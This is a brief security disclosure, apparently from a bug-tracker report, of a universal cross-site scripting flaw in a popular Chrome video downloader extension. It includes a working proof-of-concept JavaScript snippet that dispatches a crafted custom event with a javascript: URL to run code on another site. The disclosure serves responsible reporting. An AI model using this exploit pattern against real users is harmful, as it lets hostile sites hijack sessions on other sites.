Video Downloader Extension: Universal XSS Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users: https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site). Any website can do this: // Change the active tab window.open("https://google.com"); // Run code in the new tab setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000); That will run arbitrary code on <a href="http://google.com" title="" class="" rel="nofollow">google.com</a>. I reported this bug to the cws team. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: taviso